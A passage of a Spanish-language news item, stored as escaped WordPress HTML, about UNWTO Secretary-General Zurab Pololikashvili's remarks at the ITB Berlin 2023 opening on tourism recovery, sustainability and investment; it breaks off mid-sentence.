Seg\u00fan el secretario general de la OMT, Zurab Pololikashvili, el mensaje es claro: \u00ab<strong>El turismo siempre vuelve<\/strong>\u00ab, y el regreso de ITB, junto con la reciente reapertura de China, es una prueba evidente de&nbsp;<strong>la renovada confianza<\/strong>&nbsp;en los viajes internacionales.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Construir un turismo mejor<\/h2>\n\n\n\n<p>El secretario general Pololiksahvili fue invitado a participar en la ceremonia oficial de inauguraci\u00f3n de la ITB 2023, junto con el Vicecanciller de Alemania, Robert Habeck, el Primer Ministro de Georgia, Irakli Garibashvili, la Alcaldesa de Berl\u00edn, Franziska Giffey, y dirigentes de los sectores p\u00fablico y privado. Aunque celebr\u00f3 los datos positivos, tambi\u00e9n subray\u00f3 que el turismo tiene la<strong>&nbsp;\u00abresponsabilidad de volver a crecer mejor.&nbsp;<\/strong>Debemos acelerar y aspirar a un turismo m\u00e1s sostenible y resiliente\u00bb.<\/p>\n\n\n\n<p>Al esbozar las prioridades de la OMT para el sector, Pololikashvili inst\u00f3 tanto a gobiernos como a empresas a reconocer la importancia de&nbsp;<strong>la educaci\u00f3n y la formaci\u00f3n<\/strong>, y subray\u00f3 el papel crucial de la&nbsp;<strong>inversi\u00f3n<\/strong>, el \u00abingrediente que falta\u00bb, para realizar planes hacia la sostenibilidad y la resiliencia. La inversi\u00f3n ser\u00e1 el lema principal del D\u00eda Mundial del Turismo 2023, que se celebrar\u00e1 el 27 de septiembre.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La OMT en ITB 2023<\/h2>\n\n\n\n<p>En ITB 2023, la OMT participar\u00e1 en una mesa redonda especial sobre el sector, centrada en las \u00abtransiciones en los viajes\u00bb, as\u00ed como intercambiar conocimientos y perspectivas clave sobre los esfuerzos de acci\u00f3n clim\u00e1tica del turismo y las expectativas de comportamiento de los turistas a medida que contin\u00faa la recuperaci\u00f3n del sector. La OMT tambi\u00e9n informar\u00e1 sobre su labor de liderazgo en el turismo para el desarrollo rural, en particular a trav\u00e9s de la iniciativa de los\u00a0<em>Best Tourism
